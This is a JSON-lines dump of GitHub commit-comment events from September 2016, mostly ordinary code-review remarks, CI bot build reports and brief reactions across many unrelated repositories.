{"id":"4604160543","type":"CommitCommentEvent","actor":{"login":"bavarija"},"repo":{"name":"Wiethoofd/WietHUD"},"payload":{"comment":{"id":19134677,"position":null,"line":null,"path":null,"commit_id":"aace336f75ecff4ea8e20992046fe5d2f874d953","created_at":"2016-09-22T18:13:44Z","updated_at":"2016-09-22T18:13:44Z","body":"[master-fd7e6614c60430e728e53ed59a7d432e03ce9779.zip](https://github.com/Wiethoofd/WietHUD/files/488025/master-fd7e6614c60430e728e53ed59a7d432e03ce9779.zip)\r\n"}},"created_at":"2016-09-22T18:13:44Z"}
{"id":"4604173573","type":"CommitCommentEvent","actor":{"login":"MikGue"},"repo":{"name":"redhat-developer/developers.redhat.com"},"payload":{"comment":{"id":19134704,"position":null,"line":null,"path":null,"commit_id":"313e19b3504706894882fd79a45b2c78b23d9a3e","created_at":"2016-09-22T18:16:02Z","updated_at":"2016-09-22T18:16:02Z","body":"Need to reject per my comment in the ticket.  I've submitted some text to address this."}},"created_at":"2016-09-22T18:16:02Z"}
{"id":"4604181041","type":"CommitCommentEvent","actor":{"login":"diegomedina248"},"repo":{"name":"xmartlabs/Android-Base-Project"},"payload":{"comment":{"id":19134723,"position":10,"line":41,"path":"app/build.gradle","commit_id":"5cfd0157b2179a618245502e20dd7c20f6742f7a","created_at":"2016-09-22T18:17:25Z","updated_at":"2016-09-22T18:17:25Z","body":"I can't put it there, since the `ProductFlavorClass` does not contain any field for this property"}},"created_at":"2016-09-22T18:17:25Z"}
{"id":"4604185627","type":"CommitCommentEvent","actor":{"login":"davisagli"},"repo":{"name":"plone/training.plone.org"},"payload":{"comment":{"id":19134731,"position":null,"line":null,"path":null,"commit_id":"5206b8f44396b9d33923f3ff7769a9cd42a15cf7","created_at":"2016-09-22T18:18:14Z","updated_at":"2016-09-22T18:18:14Z","body":"Battle of the bots! /me gets popcorn"}},"created_at":"2016-09-22T18:18:14Z"}
{"id":"4604185632","type":"CommitCommentEvent","actor":{"login":"webierweb"},"repo":{"name":"Strategy11/formidable-forms"},"payload":{"comment":{"id":19134732,"position":null,"line":null,"path":null,"commit_id":"2856fdd95ffc28ec80e14f5ef2f093f1d1aba9c9","created_at":"2016-09-22T18:18:14Z","updated_at":"2016-09-22T18:18:14Z","body":"For lines that are light red but have a single word as dark red, I assume that I leave everything on the line except for the dark red? \"$event,\" Removed \"event\" leaving \"$,\"\r\n\r\nCorrect?"}},"created_at":"2016-09-22T18:18:14Z"}
{"id":"4604198078","type":"CommitCommentEvent","actor":{"login":"pirapira"},"repo":{"name":"ethereum/go-ethereum"},"payload":{"comment":{"id":19134755,"position":12,"line":36,"path":"core/state/state_write.go","commit_id":"c82c5b022f0ce96e7c80599307872609e6527eea","created_at":"2016-09-22T18:20:32Z","updated_at":"2016-09-22T18:20:32Z","body":"Does this mean, unmodified cache will also be written back to DB?"}},"created_at":"2016-09-22T18:20:32Z"}
{"id":"4604209450","type":"CommitCommentEvent","actor":{"login":"Aleyamma"},"repo":{"name":"Aleyamma/imad-2016-app"},"payload":{"comment":{"id":19134772,"position":null,"line":null,"path":null,"commit_id":"352d66d166edd80f02293a4e6bbca8fe26fe6282","created_at":"2016-09-22T18:22:34Z","updated_at":"2016-09-22T18:22:34Z","body":"wrongly added"}},"created_at":"2016-09-22T18:22:34Z"}
{"id":"4604209935","type":"CommitCommentEvent","actor":{"login":"Tee7even"},"repo":{"name":"minecrafter/voxelwind"},"payload":{"comment":{"id":19134773,"position":5,"line":126,"path":"api/src/main/java/com/voxelwind/api/server/event/block/BlockReplaceEvent.java","commit_id":"fe8d1cebd2aa3a61216b81524f39d76aea5ac99d","created_at":"2016-09-22T18:22:39Z","updated_at":"2016-09-22T18:22:39Z","body":"API's not a minor detail. You design it once and every change later will be\npainful. I would make a PR, but I'm not aware of all of your plans and the\npicture in general, most likely you won't like it.\n\n22 сент. 2016 г. 22:06 пользователь \"Tux\" <notifications@github.com>\nнаписал:\n\n> I do not have any time to argue about \"what's the best approach?\" over\n> what I think is a minor detail.\n>\n> Do you want to change it? If so, file a PR.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/minecrafter/voxelwind/commit/fe8d1cebd2aa3a61216b81524f39d76aea5ac99d#commitcomment-19134569>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AGc0WuIf3dhuSmuqaoR3KRfy_7eS6bbvks5qssOrgaJpZM4KCwZ->\n> .\n>\n"}},"created_at":"2016-09-22T18:22:39Z"}
{"id":"4604210494","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19134776,"position":null,"line":null,"path":null,"commit_id":"f85b91b0daca61bf5ee07214776853eb0591a95a","created_at":"2016-09-22T18:22:45Z","updated_at":"2016-09-22T18:22:45Z","body":"develop (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (1768 of 1768 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f85b91b0daca61bf5ee07214776853eb0591a95a-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f85b91b0daca61bf5ee07214776853eb0591a95a-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-22T18:22:45Z"}
{"id":"4604211044","type":"CommitCommentEvent","actor":{"login":"squeek502"},"repo":{"name":"squeek502/AppleCore"},"payload":{"comment":{"id":19134782,"position":4,"line":8,"path":"java/squeek/applecore/ModInfo.java","commit_id":"c7c9d75e75a830c2b00b315ea06357bba5cb99b6","created_at":"2016-09-22T18:22:50Z","updated_at":"2016-09-22T18:22:50Z","body":"It's named without the space pretty much everywhere right now ([CurseForge](https://minecraft.curseforge.com/projects/applecore), [MCF](http://www.minecraftforum.net/forums/mapping-and-modding/minecraft-mods/2222837-applecore-an-api-for-modifying-the-food-and-hunger)), not sure if there's a point to change it."}},"created_at":"2016-09-22T18:22:50Z"}
{"id":"4604212650","type":"CommitCommentEvent","actor":{"login":"magsout"},"repo":{"name":"webcompat/web-bugs"},"payload":{"comment":{"id":19134785,"position":6,"line":19,"path":"README.md","commit_id":"fce76a47bb6add472b607be8fb14afbd7ba7d059","created_at":"2016-09-22T18:23:08Z","updated_at":"2016-09-22T18:23:08Z","body":"Explorer"}},"created_at":"2016-09-22T18:23:08Z"}
{"id":"4604213089","type":"CommitCommentEvent","actor":{"login":"dangothemango"},"repo":{"name":"dangothemango/Dat-Boii"},"payload":{"comment":{"id":19134786,"position":null,"line":null,"path":null,"commit_id":"b30f0e8de28867ecad2c354d0acabf7548de5101","created_at":"2016-09-22T18:23:12Z","updated_at":"2016-09-22T18:23:12Z","body":"Accidentally committed in the wrong command prompt"}},"created_at":"2016-09-22T18:23:12Z"}
{"id":"4604213711","type":"CommitCommentEvent","actor":{"login":"magsout"},"repo":{"name":"webcompat/web-bugs"},"payload":{"comment":{"id":19134788,"position":10,"line":22,"path":"README.md","commit_id":"fce76a47bb6add472b607be8fb14afbd7ba7d059","created_at":"2016-09-22T18:23:19Z","updated_at":"2016-09-22T18:23:19Z","body":"Contacted "}},"created_at":"2016-09-22T18:23:19Z"}
{"id":"4604220339","type":"CommitCommentEvent","actor":{"login":"lptr"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":19134801,"position":null,"line":null,"path":null,"commit_id":"f2639179372eba1ebe9de885939b02d6160a1a20","created_at":"2016-09-22T18:24:34Z","updated_at":"2016-09-22T18:24:34Z","body":"👍 "}},"created_at":"2016-09-22T18:24:34Z"}
{"id":"4604224325","type":"CommitCommentEvent","actor":{"login":"Andrey1960"},"repo":{"name":"Andrey1960/gittesting"},"payload":{"comment":{"id":19134817,"position":null,"line":null,"path":null,"commit_id":"e6723274ffd207a15652fa3d82f10f85e01492a1","created_at":"2016-09-22T18:25:17Z","updated_at":"2016-09-22T18:25:17Z","body":"А вам!"}},"created_at":"2016-09-22T18:25:17Z"}
{"id":"4604229698","type":"CommitCommentEvent","actor":{"login":"baronvonvaderham"},"repo":{"name":"AASHE/hub"},"payload":{"comment":{"id":19134832,"position":9,"line":104,"path":"hub/templates/base.html","commit_id":"14a9af5b638571e4d3f30ba92cd4800d9f758b8b","created_at":"2016-09-22T18:26:14Z","updated_at":"2016-09-22T18:26:14Z","body":"Oops, yeah I think I was c/p-ing the tags and then editing the key and missed this one."}},"created_at":"2016-09-22T18:26:14Z"}
{"id":"4604233953","type":"CommitCommentEvent","actor":{"login":"justinbmeyer"},"repo":{"name":"canjs/bit-docs-html-canjs"},"payload":{"comment":{"id":19134840,"position":23,"line":21,"path":"static/content.less","commit_id":"a31b158d0d62a6753b9476819cbe4fb9d82ecf14","created_at":"2016-09-22T18:27:00Z","updated_at":"2016-09-22T18:27:00Z","body":"why `.code` here?  This breaks the highlight. "}},"created_at":"2016-09-22T18:27:00Z"}
{"id":"4604240214","type":"CommitCommentEvent","actor":{"login":"eabatalov"},"repo":{"name":"equivalence1/au-linux-kernel-autumn-2016"},"payload":{"comment":{"id":19134852,"position":32,"line":74,"path":"tasks/linked_lists/module.c","commit_id":"09d21fb5be8d926c3162a47b61603b57973c9321","created_at":"2016-09-22T18:28:09Z","updated_at":"2016-09-22T18:28:09Z","body":"Yep. Usually only cleanup is performed on error recovery code path."}},"created_at":"2016-09-22T18:28:09Z"}
{"id":"4604247081","type":"CommitCommentEvent","actor":{"login":"GirafiStudios"},"repo":{"name":"squeek502/AppleCore"},"payload":{"comment":{"id":19134871,"position":4,"line":8,"path":"java/squeek/applecore/ModInfo.java","commit_id":"c7c9d75e75a830c2b00b315ea06357bba5cb99b6","created_at":"2016-09-22T18:29:25Z","updated_at":"2016-09-22T18:29:25Z","body":"You have a point there! Just saying it is the standard. For example you have named it with a space in Waila Harvestability :)"}},"created_at":"2016-09-22T18:29:25Z"}
{"id":"4604248402","type":"CommitCommentEvent","actor":{"login":"eabatalov"},"repo":{"name":"equivalence1/au-linux-kernel-autumn-2016"},"payload":{"comment":{"id":19134877,"position":7,"line":5,"path":"tasks/linked_lists/stack.c","commit_id":"09d21fb5be8d926c3162a47b61603b57973c9321","created_at":"2016-09-22T18:29:38Z","updated_at":"2016-09-22T18:29:38Z","body":"No need for void* place variable. Just cast pointer returned by kmalloc to stack_entry_t."}},"created_at":"2016-09-22T18:29:38Z"}
{"id":"4604250582","type":"CommitCommentEvent","actor":{"login":"isabelleamericano"},"repo":{"name":"isabelleamericano/give-and-take"},"payload":{"comment":{"id":19134882,"position":null,"line":null,"path":null,"commit_id":"9133413b48fe319d694866da0d408f95b1396b86","created_at":"2016-09-22T18:30:03Z","updated_at":"2016-09-22T18:30:03Z","body":"nao gostei"}},"created_at":"2016-09-22T18:30:03Z"}
{"id":"4604250684","type":"CommitCommentEvent","actor":{"login":"sompylasar"},"repo":{"name":"mzhurovich/Current"},"payload":{"comment":{"id":19134883,"position":214,"line":188,"path":"Karl/integrations/nodejs/claire.js","commit_id":"1e136f702c1e0134b328dcbff65c310011eedece","created_at":"2016-09-22T18:30:04Z","updated_at":"2016-09-22T18:30:04Z","body":"`error: { message: \"...\" }`? "}},"created_at":"2016-09-22T18:30:04Z"}
{"id":"4604253112","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19134889,"position":null,"line":null,"path":null,"commit_id":"a236e3799d08fc43546c7cb5c7204f70ef918444","created_at":"2016-09-22T18:30:28Z","updated_at":"2016-09-22T18:30:28Z","body":"MoreDayliteFollowup (JasonGlazer) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2369 of 2376 tests passed, 25 test warnings)\n\n * 32 tests had: AUD diffs.\n * 15 tests had: Table small diffs.\n * 3 tests had: EIO diffs.\n * 3 tests had: RDD diffs.\n * 7 tests had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a236e3799d08fc43546c7cb5c7204f70ef918444-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a236e3799d08fc43546c7cb5c7204f70ef918444-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.71%25-yellow.svg)</a> \n"}},"created_at":"2016-09-22T18:30:28Z"}
{"id":"4604253399","type":"CommitCommentEvent","actor":{"login":"minecrafter"},"repo":{"name":"minecrafter/voxelwind"},"payload":{"comment":{"id":19134890,"position":5,"line":126,"path":"api/src/main/java/com/voxelwind/api/server/event/block/BlockReplaceEvent.java","commit_id":"fe8d1cebd2aa3a61216b81524f39d76aea5ac99d","created_at":"2016-09-22T18:30:31Z","updated_at":"2016-09-22T18:30:31Z","body":"`Cancellable` is useful _only_ for binary \"cancelled\" states. It is not appropriate in all cases.\r\n\r\nHere's my justification for not using `Cancellable`:\r\n\r\n* Some events are _conditionally_ cancellable. Look at `PlayerLoginEvent` for an example. It would be invalid to have a cancelled event without a reason.\r\n* Some events may have more than one result. I do not have any examples for this one yet, however thanks to the event system's flexibility I can add one."}},"created_at":"2016-09-22T18:30:31Z"}
{"id":"4604258803","type":"CommitCommentEvent","actor":{"login":"eabatalov"},"repo":{"name":"equivalence1/au-linux-kernel-autumn-2016"},"payload":{"comment":{"id":19134903,"position":17,"line":15,"path":"tasks/linked_lists/stack.c","commit_id":"09d21fb5be8d926c3162a47b61603b57973c9321","created_at":"2016-09-22T18:31:27Z","updated_at":"2016-09-22T18:31:27Z","body":"Use INIT_LIST_HEAD instead.\r\nDon't copy-paste internal kernel list logic. You component is not responsible for it. List implementation may change."}},"created_at":"2016-09-22T18:31:27Z"}
{"id":"4604262234","type":"CommitCommentEvent","actor":{"login":"mgechev"},"repo":{"name":"mgechev/angular2-seed"},"payload":{"comment":{"id":19134914,"position":4,"line":439,"path":"tools/config/seed.config.ts","commit_id":"63d5ea8436032b7d24496de0deb6983ef65134e5","created_at":"2016-09-22T18:32:02Z","updated_at":"2016-09-22T18:32:02Z","body":"@sasikumardr there were a couple of issues with this fix:\r\n\r\n- The rewrites are fixed so when you add a new directory you have to add it by hand.\r\n- If you generate the rewrites on server start it still can get tricky when you add new files and directories ([here's an](https://github.com/mgechev/angular2-seed/tree/dev-server) experiment).\r\n\r\nI thought about generating only a flat list of directories which are inside `src/client` but still we can't handle 404 properly.\r\n\r\nBasically I think the drawbacks for having the history api fallback failing for URLs with dots are less compared to the ones we get with the rewrites."}},"created_at":"2016-09-22T18:32:02Z"}
{"id":"4604263516","type":"CommitCommentEvent","actor":{"login":"pirapira"},"repo":{"name":"ethereum/go-ethereum"},"payload":{"comment":{"id":19134918,"position":116,"line":379,"path":"core/state/state.go","commit_id":"474a20040bdebefa4082ff3b3bd1dea7c9678878","created_at":"2016-09-22T18:32:14Z","updated_at":"2016-09-22T18:32:14Z","body":"I wonder if already modified `StateObject`s should be removed."}},"created_at":"2016-09-22T18:32:14Z"}
{"id":"4604267364","type":"CommitCommentEvent","actor":{"login":"jbgi"},"repo":{"name":"adelbertc/faq"},"payload":{"comment":{"id":19134927,"position":277,"line":277,"path":"src/main/tut/subtype-typeclasses.compiled.md","commit_id":"2e8c7953422401879c5cfcf3ffc2d24675ec0fd8","created_at":"2016-09-22T18:32:53Z","updated_at":"2016-09-22T18:32:53Z","body":"This is not strictly required by the encoding: in scalaz 8 the hierarchy is isolated in a \"[hierarchy prelude](https://github.com/scalaz/scalaz/blob/series/8.0.x/base/src/main/scala/BaseHierarchy.scala)\" (but then it need to be imported via `import scalaz._`). This, together with [some simple rules](https://github.com/scalaz/scalaz/blob/series/8.0.x/CONTRIBUTING.md#type-classes) allow to avoid ambiguities in all cases.\r\n\r\nExtensibility (adding type classes outside scalaz8) could be preserved via alternative/custom \"Prelude\" traits that extend the scalaz `BaseHierarchy.BH0` trait.\r\n"}},"created_at":"2016-09-22T18:32:53Z"}
{"id":"4604268834","type":"CommitCommentEvent","actor":{"login":"bshishov"},"repo":{"name":"bshishov/Memorandum"},"payload":{"comment":{"id":19134933,"position":7,"line":7,"path":"main/factories.py","commit_id":"43ebc89740bebd1672d4a3003f4646268f9037b7","created_at":"2016-09-22T18:33:10Z","updated_at":"2016-09-22T18:33:10Z","body":"Переименовать Factory хотя бы в ItemFactory, а то слишком абстрактно"}},"created_at":"2016-09-22T18:33:10Z"}
{"id":"4604272636","type":"CommitCommentEvent","actor":{"login":"59azul"},"repo":{"name":"59azul/projetos_faculdade"},"payload":{"comment":{"id":19134947,"position":null,"line":null,"path":null,"commit_id":"fdb8c85d2b29c7f6f5a01ed689883bb5b6ab4269","created_at":"2016-09-22T18:33:51Z","updated_at":"2016-09-22T18:33:51Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;DYiAMe9k&#x2F;24-projeto-1-poo\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Projeto 1 - POO</a>"}},"created_at":"2016-09-22T18:33:51Z"}
{"id":"4604273093","type":"CommitCommentEvent","actor":{"login":"59azul"},"repo":{"name":"59azul/projetos_faculdade"},"payload":{"comment":{"id":19134948,"position":null,"line":null,"path":null,"commit_id":"b4b57f770c5f9befc22e79b5082396f17c9a634d","created_at":"2016-09-22T18:33:56Z","updated_at":"2016-09-22T18:33:56Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;DYiAMe9k&#x2F;24-projeto-1-poo\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Projeto 1 - POO</a>"}},"created_at":"2016-09-22T18:33:56Z"}
{"id":"4604274326","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19134954,"position":null,"line":null,"path":null,"commit_id":"a236e3799d08fc43546c7cb5c7204f70ef918444","created_at":"2016-09-22T18:34:09Z","updated_at":"2016-09-22T18:34:09Z","body":"MoreDayliteFollowup (JasonGlazer) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a236e3799d08fc43546c7cb5c7204f70ef918444-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-22T18:34:09Z"}
{"id":"4604275417","type":"CommitCommentEvent","actor":{"login":"bshishov"},"repo":{"name":"bshishov/Memorandum"},"payload":{"comment":{"id":19134959,"position":6,"line":30,"path":"main/apps.py","commit_id":"43ebc89740bebd1672d4a3003f4646268f9037b7","created_at":"2016-09-22T18:34:22Z","updated_at":"2016-09-22T18:34:22Z","body":"Правильнее бы MIME_TYPES или что то такое. MIME само по себе неисчисляемое (аббревиатура)."}},"created_at":"2016-09-22T18:34:22Z"}
{"id":"4604282738","type":"CommitCommentEvent","actor":{"login":"bshishov"},"repo":{"name":"bshishov/Memorandum"},"payload":{"comment":{"id":19134975,"position":41,"line":41,"path":"main/item_reps.py","commit_id":"43ebc89740bebd1672d4a3003f4646268f9037b7","created_at":"2016-09-22T18:35:39Z","updated_at":"2016-09-22T18:35:39Z","body":"DirectoryRepresentation"}},"created_at":"2016-09-22T18:35:39Z"}
{"id":"4604283842","type":"CommitCommentEvent","actor":{"login":"my-instantcms"},"repo":{"name":"instantsoft/icms2"},"payload":{"comment":{"id":19134976,"position":null,"line":null,"path":null,"commit_id":"b2b8fcd94d0e53951e60269d76bb324e77c8f067","created_at":"2016-09-22T18:35:51Z","updated_at":"2016-09-22T18:35:51Z","body":"Здравствуйте.\r\nПри добавлении комментарии, получаем ошибку:\r\n```\r\nUnknown column 'i.is_approved' in 'where clause'\r\n\r\nSELECT i.*\r\nFROM cms_comments_tracks i\r\nWHERE (i.target_controller = 'content') AND (i.target_subject = 'articles') AND (i.target_id = '11') \r\nAND (i.is_approved = '1') \r\nAND (i.target_controller = 'content') AND (i.target_subject = 'articles') AND (i.target_id = '11')\r\n```\r\n\r\nГде то не очищается фильтры, скорей всего в модели компонента, в функции getCommentsCount, но тут еще в запросе условия повторяются"}},"created_at":"2016-09-22T18:35:51Z"}
{"id":"4604284023","type":"CommitCommentEvent","actor":{"login":"bshishov"},"repo":{"name":"bshishov/Memorandum"},"payload":{"comment":{"id":19134977,"position":35,"line":35,"path":"main/item_reps.py","commit_id":"43ebc89740bebd1672d4a3003f4646268f9037b7","created_at":"2016-09-22T18:35:53Z","updated_at":"2016-09-22T18:35:53Z","body":"FileRepresentation"}},"created_at":"2016-09-22T18:35:53Z"}
{"id":"4604293412","type":"CommitCommentEvent","actor":{"login":"fuzegit"},"repo":{"name":"instantsoft/icms2"},"payload":{"comment":{"id":19135005,"position":null,"line":null,"path":null,"commit_id":"b2b8fcd94d0e53951e60269d76bb324e77c8f067","created_at":"2016-09-22T18:37:31Z","updated_at":"2016-09-22T18:37:31Z","body":"Здравствуйте. Обратите внимание на пакет обновления и изменения в БД https://github.com/instantsoft/icms2/tree/master/update"}},"created_at":"2016-09-22T18:37:31Z"}
{"id":"4604294248","type":"CommitCommentEvent","actor":{"login":"lptr"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":19135008,"position":null,"line":null,"path":null,"commit_id":"f2639179372eba1ebe9de885939b02d6160a1a20","created_at":"2016-09-22T18:37:39Z","updated_at":"2016-09-22T18:37:39Z","body":"This is fantastic. I guess `TaskArtifactStateCacheAccess` doesn't need to extend `CacheAccess` anymore either?"}},"created_at":"2016-09-22T18:37:39Z"}
{"id":"4604297965","type":"CommitCommentEvent","actor":{"login":"Mitrofan4ik"},"repo":{"name":"Mitrofan4ik/new-site-on-wordpress"},"payload":{"comment":{"id":19135019,"position":null,"line":null,"path":null,"commit_id":"b3b16975243e2bf66c03e3a22fc5303fae6d3cf5","created_at":"2016-09-22T18:38:20Z","updated_at":"2016-09-22T18:38:20Z","body":"first commit"}},"created_at":"2016-09-22T18:38:20Z"}
{"id":"4604298717","type":"CommitCommentEvent","actor":{"login":"pirapira"},"repo":{"name":"ethereum/go-ethereum"},"payload":{"comment":{"id":19135021,"position":116,"line":379,"path":"core/state/state.go","commit_id":"474a20040bdebefa4082ff3b3bd1dea7c9678878","created_at":"2016-09-22T18:38:27Z","updated_at":"2016-09-22T18:38:27Z","body":"Oh no please forget the above comment.  I commented on an intermediate state after a previous commit."}},"created_at":"2016-09-22T18:38:27Z"}
{"id":"4604300550","type":"CommitCommentEvent","actor":{"login":"bshishov"},"repo":{"name":"bshishov/Memorandum"},"payload":{"comment":{"id":19135031,"position":9,"line":9,"path":"main/factories.py","commit_id":"43ebc89740bebd1672d4a3003f4646268f9037b7","created_at":"2016-09-22T18:38:47Z","updated_at":"2016-09-22T18:38:47Z","body":"переименовать url в relative_path. т.к. это не url"}},"created_at":"2016-09-22T18:38:47Z"}
{"id":"4604303463","type":"CommitCommentEvent","actor":{"login":"eabatalov"},"repo":{"name":"equivalence1/au-linux-kernel-autumn-2016"},"payload":{"comment":{"id":19135041,"position":6,"line":6,"path":"tasks/linked_lists/stack.h","commit_id":"09d21fb5be8d926c3162a47b61603b57973c9321","created_at":"2016-09-22T18:39:19Z","updated_at":"2016-09-22T18:39:19Z","body":"You don't alloc memory in header so need to move this include directives into stack.c.\r\nWhen you include something in a file it means you use it in the file."}},"created_at":"2016-09-22T18:39:19Z"}
{"id":"4604304177","type":"CommitCommentEvent","actor":{"login":"bshishov"},"repo":{"name":"bshishov/Memorandum"},"payload":{"comment":{"id":19135044,"position":55,"line":34,"path":"main/items.py","commit_id":"43ebc89740bebd1672d4a3003f4646268f9037b7","created_at":"2016-09-22T18:39:27Z","updated_at":"2016-09-22T18:39:27Z","body":"Вместо конструктора использовать Factory"}},"created_at":"2016-09-22T18:39:27Z"}
{"id":"4604306182","type":"CommitCommentEvent","actor":{"login":"alflanagan"},"repo":{"name":"alflanagan/ChezScheme"},"payload":{"comment":{"id":19135047,"position":null,"line":null,"path":null,"commit_id":"15982a28189454d5b7b3b065db5aac9816781bde","created_at":"2016-09-22T18:39:48Z","updated_at":"2016-09-22T18:39:48Z","body":"This breaks Linux builds: S_stats_init() needs #ifdef WIN32 / #else / #endif"}},"created_at":"2016-09-22T18:39:48Z"}
{"id":"4604309263","type":"CommitCommentEvent","actor":{"login":"HybridDog"},"repo":{"name":"bell07/minetest-towntest"},"payload":{"comment":{"id":19135053,"position":null,"line":null,"path":null,"commit_id":"6e2643a47c4c098beb491b15919ee035131c70b4","created_at":"2016-09-22T18:40:13Z","updated_at":"2016-09-22T18:40:13Z","body":"You don't need to put the date into the commit message, the information is stored in the commit automatically, see the patch: https://github.com/bell07/minetest-towntest/commit/6e2643a47c4c098beb491b15919ee035131c70b4.patch"}},"created_at":"2016-09-22T18:40:13Z"}
{"id":"4604313485","type":"CommitCommentEvent","actor":{"login":"Pokaia"},"repo":{"name":"rubberpants/rocket"},"payload":{"comment":{"id":19135066,"position":null,"line":null,"path":null,"commit_id":"dd28330fd015c3e7c8de659179495a435ba3d33f","created_at":"2016-09-22T18:40:51Z","updated_at":"2016-09-22T18:40:51Z","body":":+1: "}},"created_at":"2016-09-22T18:40:51Z"}
{"id":"4604318334","type":"CommitCommentEvent","actor":{"login":"alflanagan"},"repo":{"name":"cisco/ChezScheme"},"payload":{"comment":{"id":19135084,"position":null,"line":null,"path":null,"commit_id":"15982a28189454d5b7b3b065db5aac9816781bde","created_at":"2016-09-22T18:41:45Z","updated_at":"2016-09-22T18:41:45Z","body":"This breaks non-Windows builds: S_stats_init() needs `#ifdef WIN32` / `#else` / `#endif`"}},"created_at":"2016-09-22T18:41:45Z"}
{"id":"4604318450","type":"CommitCommentEvent","actor":{"login":"bshishov"},"repo":{"name":"bshishov/Memorandum"},"payload":{"comment":{"id":19135085,"position":14,"line":14,"path":"main/item_reps.py","commit_id":"43ebc89740bebd1672d4a3003f4646268f9037b7","created_at":"2016-09-22T18:41:47Z","updated_at":"2016-09-22T18:41:47Z","body":"Может сделаем здесь Lazy Load возможного редактора. К этому полю за один запрос несколько обращений."}},"created_at":"2016-09-22T18:41:47Z"}
{"id":"4604319080","type":"CommitCommentEvent","actor":{"login":"jwillemsen"},"repo":{"name":"DOCGroup/ACE_TAO"},"payload":{"comment":{"id":19135090,"position":5,"line":210,"path":"TAO/orbsvcs/orbsvcs/AV/sfp.h","commit_id":"7a3126ae033cfab39c26ce38ad6112cf51e92f0d","created_at":"2016-09-22T18:41:54Z","updated_at":"2016-09-22T18:41:54Z","body":"Please remove obsolete code instead of commenting it out"}},"created_at":"2016-09-22T18:41:54Z"}
{"id":"4604329000","type":"CommitCommentEvent","actor":{"login":"BenjaminHae"},"repo":{"name":"zeruniverse/Password-Manager"},"payload":{"comment":{"id":19135119,"position":5,"line":44,"path":"src/function/sqllink.php","commit_id":"dfff00a8a137304dd8cbdef5d32f6e45463ddfc6","created_at":"2016-09-22T18:43:37Z","updated_at":"2016-09-22T18:43:37Z","body":"For example, if your site is \"site.com\" make sure \"site.com.attacker.com\" doesn't pass your origin check.(https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet#Checking_The_Referer_Header)"}},"created_at":"2016-09-22T18:43:37Z"}
{"id":"4604331949","type":"CommitCommentEvent","actor":{"login":"bshishov"},"repo":{"name":"bshishov/Memorandum"},"payload":{"comment":{"id":19135127,"position":11,"line":55,"path":"main/views.py","commit_id":"43ebc89740bebd1672d4a3003f4646268f9037b7","created_at":"2016-09-22T18:44:09Z","updated_at":"2016-09-22T18:44:09Z","body":"Может лучше owner вмеcто url_user"}},"created_at":"2016-09-22T18:44:09Z"}
{"id":"4604336514","type":"CommitCommentEvent","actor":{"login":"eabatalov"},"repo":{"name":"LDVSOFT/au-linux-kernel-autumn-2016"},"payload":{"comment":{"id":19135147,"position":14,"line":11,"path":"tasks/linked_lists/stack.c","commit_id":"702afd68eb7a5bc8ac9166fc4fafa68b43bdc641","created_at":"2016-09-22T18:44:59Z","updated_at":"2016-09-22T18:44:59Z","body":"Every non trivial data member should be explicitly initialized.\r\nSo please call INIT_LIST_HEAD here."}},"created_at":"2016-09-22T18:44:59Z"}
{"id":"4604338542","type":"CommitCommentEvent","actor":{"login":"squeek502"},"repo":{"name":"squeek502/AppleCore"},"payload":{"comment":{"id":19135156,"position":4,"line":8,"path":"java/squeek/applecore/ModInfo.java","commit_id":"c7c9d75e75a830c2b00b315ea06357bba5cb99b6","created_at":"2016-09-22T18:45:19Z","updated_at":"2016-09-22T18:45:19Z","body":"I'm a rebel. 😈 "}},"created_at":"2016-09-22T18:45:19Z"}
{"id":"4604342888","type":"CommitCommentEvent","actor":{"login":"bshishov"},"repo":{"name":"bshishov/Memorandum"},"payload":{"comment":{"id":19135169,"position":39,"line":101,"path":"main/views.py","commit_id":"43ebc89740bebd1672d4a3003f4646268f9037b7","created_at":"2016-09-22T18:46:06Z","updated_at":"2016-09-22T18:46:06Z","body":"Мне кажется, что действие должно выполнятся над itemом, а не над его представлением, хотя спорно конечно. Но ведь именно редактор должен делать представление. Кроме того, в большинстве действий (например скачивание) представления не нужны."}},"created_at":"2016-09-22T18:46:06Z"}
